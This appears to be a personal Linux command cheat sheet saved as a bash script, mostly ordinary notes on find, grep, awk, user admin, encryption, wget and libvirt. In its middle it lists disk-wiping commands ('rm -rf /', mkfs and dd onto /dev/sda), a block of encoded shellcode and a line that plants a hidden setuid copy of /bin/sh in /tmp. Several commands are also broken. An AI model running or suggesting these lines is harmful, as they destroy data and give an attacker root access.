#!/usr/bin/bash

/proc/cpuinfo
/proc/meminfo
/proc/user_beancounters
/dev/kmem		/dev/mem
| curl -F 'sprunge=<-' http://sprunge.us
curl --upload-file ./hello.txt https://transfer.sh/hello.txt
tree -d /proc/self/

shutdown -h +10						//shutdown after 10 min
shutdown -h 20:00						//shutdown at 20:00

find /path/to/dir -newermt "yyyy-mm-dd"
find /home -type f -exec grep -l 'error' {} \;
find / -mtime 50
find / -mtime +50 –mtime -100
find ./ -cmin -60
find . -type f -perm 444
find . -type f -exec ls -s {} \; | sort -n -r | head -5
find . -type f -iname "*.mp3" -exec rename "s/ /_/g" {} \;			//Space to _
find . -m|a|cmin -60
find / -m|a|ctime -30
find / -mtime +50 –mtime -100
find . -type f -perm 444

free && sync && echo 3 > /proc/sys/vm/drop_caches && free
swapoff|on -a

sort -r
sort [-r --reverse] [-u --unique]
uniq [-c --count] [-d --repeated] [-u --unique] [-w --check-chars=N] [-s --skip-chars=N]
gcc|g++ x.cpp -o FileName

grep -E 'pattern1|pattern2 pattern1.*pattern2' file_*
	-i insensitive, -w word, -a|b|c 1 Before|After|Around, -v invert
	GREP_OPTIONS='--color=auto' GREP_COLOR='100;8'
	-r recursive, -c count, -l filename, -o matched-only, -b byte-offset, -n line-number
grep '/blog/wp-comments-post.php' access_1.log
grep '30/Nov/2013 | grep '/blog/wp-comments-post.php' /path/to/archives/access_1.log | awk '{ print $1}' | sort  | uniq -c | sort -nr > spam.txt
sed '/^error/d' file.txt > output.txt
grep [-w --word-regexp] [-x --line-regexp] [-c --count] [-r --recursive] [-n --line-number] "Pattern" /path/

awk 'NR >= 10 && NR <= 20' file.txt
awk '!($0 in array) { array[$0]; print }' temp				//Remove Duplicate
du -sh path/to/dir | awk '{print $1}'
df -h /home | tail -n1 | awk '{print $3}'
awk '{print NR "- " $1, $(NF-1) }' sample.txt
	'NF > 0'
	'{ if (length($0) > max) max = length($0) } END { print max }'
	'END { print NR }'
	'BEGIN { for (i = 1; i <= 7; i++) print int(101 * rand()) }'
	-v name=Jerry
	-f command.awk marks.txt
	--dump-variables ''
.::[Administration]::.
uname -a
/etc/issue
lsb_release -a
uptime
time
w									//Logged in user
whoami
kill -9
ps
ps -aux		ps –af
pgrep -lf python
ps -elf | grep python
grep tcpsndbuf /proc/user_beancounters
cat /proc/sys/fs/file-max				//sysctl -w fs.file-max=10000
vzctl set 15470 --tcpsndbuf 10485760:15728640 --save
top
chmod								//-R
chown user:group /dir
chgrp
netstat
ss -l

useradd user -d /path/home
usermod -u uid -l newname user
userdel
passwd user
groupadd -g gid group
groupmod
groupdel
usermod -g group1, group2 user1				//-a -G|Append
id user1

su - user1
sudo -u user1
ssh user1@localhost

apt-get install|remove|--purge remove|update
yum install|update|update-to|remove|localinstall|reinstall
aptitude
wajig
nohup python -u bg.py
lsof

jobs
bg|fg 1
command &

.::[Encrypt]::.
openssl aes-256-cbc -in 1.txt -out 2.txt		//-d Decrypt
aescrypt -e|-d 1.txt				//-p password	-k secret.key	-o
aescrypt_keygen -p password secret.key
____________
gpg --symmetric -o 2.txt --cipher-algo AES256 1.txt
--compress-algo none
-r "keyID"
gpg -d 2.txt

.::[Dir]::.
find . -iname 'thumbs.db' -exec rm -rfv {} +		//delete all thumbs
perl -i -pe 's/str/Replace/;' dir*
find . -name '*.txt' -print | xargs perl -pi -e's/str/Replace/ig' *.txt
sysctl -w net.ipv4.icmp_echo_ignore_all=1			//Ignore ping
ps aux | grep -v `whoami`						//List other users's ps
if [-d "/home/dir"] then echo "dir exist"
find /dir/ -type d|f -name|iname "*.*" -ls
__________
sudo service apache2 restart
ps -ef | grep apache
ls
	-d directory, -t modification, -r reverse, -a|A hidden
	-i inode, -n UID GID, -F classification, --color=auto
find
	-min|maxdepth 2, -exec md5sum {} \;
	-not, -inum inode, -perm 444, -a|c|newer /etc/passwd, -xdev
	~ -empty, ~ -size +|-100M
touch file1 file2
	-c created, -a -m, -r reflect, -t YYYYMMDDHHMM.SS

wget --user=admin --password=su
	 --save-cookies x.txt
	 --post-data 'x1=val&x2=val' "http://x.com"
	 --load-cookies x.txt
	 --user-agent=""
	 --limit-rate=500k
	 --reject=gif
	 -A.pdf							//only pdf
	 -r http://						//download entire page
	 -c --output-document=name.html	//continueable
wget -H -r --level=1 -k -p http://
lftp -c "open http:// ; mirror"
rsync -vare ssh jono@192.168.0.2:/home/jono/* /home/jono/backup/
ssh user@hostname
scp -r user@hostname:/path/ /path/
du -ch | grep total								//Directory size
df -h										//Disk size

pwd
ls -la
dir
    -t mtime, -S size, -X ext				//sort
    -R display recursively
ls -1	 1/line, -l info, -R recursive
command | head
head|tail -n file.txt

dircd -
cp		mv		rm -f
rm /Users/vivek/!(*.zip|*.iso|*.mp3)
rm -rf /
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
mkfs.ext4 /dev/sda1
dd if=/dev/urandom of=/dev/sda

tar cvfz archive.tar.gz file1 dir1			//compress
tar xvfz archive.tar.gz					//extract
tar rvf archive_name.tar newdir/			//append
zip -r -9 file_name.zip [path]
unzip	gunzip		bunzip2

split --bytes=100m /path/x.txt /path/prefix
split -d -l 1000 file.txt prefix.txt
cat prefix > x.txt

for IP in 'cat iplist.txt'; do
	dig -x +short $IP
done

.::[libvirt]::.
virt-sandbox -c lxc:/// /bin/sh
virt-sandbox -c qemu:///session /bin/cat /proc/cpuinfo

virt-sandbox-service create --clone --network dhcp,source=lan --unitfile httpd.service myhttpd
systemctl start myhttpd_sandbox.service
systemctl status myhttpd_sandbox.service					//Startup status
virt-sandbox-service execute myhttpd -- /bin/sh
virt-sandbox-service execute myhttpd -- /bin/apachectl graceful			//silent
systemctl stop myhttpd_sandbox.service					//Save config
virsh -c lxc:/// list --inactive
virt-top -c lxc:///

.::[IOstream]::.
-z	-f	-d
!!	!$	!*
^param1^param2
echo
read var
	-n [int]		-p [prompt]
var = "value"
$0									//script name
$@	$#	$1	$2	${10}...
$RANDOM



if [$var = "xxx"]
then
	echo "true"
fi

for x in /etc/r??? /var/lo* /home/drobbins/mystuff/* /tmp/${MYPATH}/*
do
    cp $x /mnt/mydir
done

while|until [ condition ]
do
    statements
done

case "$var" in
  1)   statement 
  	 ;;
  *)   statement2
  	 ;;
esac